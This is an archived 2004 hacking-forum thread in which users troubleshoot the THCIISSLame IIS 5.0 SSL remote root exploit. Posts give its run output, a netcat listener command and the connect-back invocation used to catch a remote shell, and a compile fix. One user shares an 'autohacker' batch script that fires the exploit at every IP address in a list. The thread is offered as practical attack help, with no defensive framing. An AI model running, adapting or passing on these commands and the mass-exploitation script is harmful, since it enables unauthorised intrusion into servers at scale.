hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
Pages: 1, 2
yuliang11
Aug 11 2004, 02:36 AM

uhh .. fixed the code. got it runned. compiled.. but eerrr... error. anyone knows what's this? failed exploits? is this working ? anyone else manage to fix the code? do send me your version. thanks man .

THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

[*] building buffer
[*] connecting the target
[*] exploit send
bind error() 10048
mortello
Aug 11 2004, 02:46 AM
I believe its because you opened NC to listen on the port that IISlame tries to listen on....

however I may be wrong since I didn't check the code and its been a f****** long time I checked this exploit...
yuliang11
Aug 12 2004, 01:52 AM
well first of all sorry for bringing this old thing up again. i know this is old. but this seems usefull .

nc?


would it be "nc -l -p 1000 -vvv" on our machine ?

i guess this is it.



and from the iis expoit we do a

"iss-exploit 10.1.1.1 10.1.1.2 1000"


oh well. anyone got the version of the code that would compile perfectly on ms-visual c++ ? thanks a lot guys



mortello
Aug 12 2004, 04:14 AM
QUOTE (yuliang11 @ Aug 12 2004, 01:52 AM)
oh well. anyone got the version of the code that would compile perfectly on ms-visual c++ ? thanks a lot guys

I believe you need to add some part to the code

like this : #pragma comment( lib, "wsock32.lib" )

put it after the includes

should make it work

else check this post : http://www.governmentsecurity.org/forum/in...showtopic=10572

or this one : http://www.governmentsecurity.org/forum/in...?showtopic=6976
NeroMatrix
Aug 13 2004, 09:47 PM
here's autohacker which you can modify for most sploits =]

CODE

@echo off
Echo  oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOOoOoOoOoOoOoOoOoOoOoOooOoOo
Echo  oOO                                                     oOo
Echo  oOo  THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit oOo
Echo  oOO                                                     oOo
Echo  oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOOoOoOoOoOoOoOoOoOoOoOooOoOo

@echo IP list name eg ip.txt:
set /p list=
@echo IP to connect back to:
set /p ip=
@echo Port to connect back to:
set /p port=
@echo off
If "%list%" =="" GoTo EXIT
for /f "eol=; tokens=1*" %%i in (%list%) do new5.0.exe %%i %ip% %port%
pause
cls
@echo.
@echo Done
pause
CLS


just whack this into a bat file change the IIS5.0.exe to what ever your exe name is and place this bat file into the same directory as your exe file and txt file. and away you go, you can use this autohacker on most sploits just just changing the exe file name.
This will just go through your list.


I read this was asked for and didn't see a reply saying someone has done it. sorry if someone has already done one smile.gif

But maybe you can help me ??

I used to be able to bind any port IIS, webdav with no problems but now i can't seem to bind anyport i've tried a huge number of different ports but i always get an error in binding a port ??? any ideas on this ?????


This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.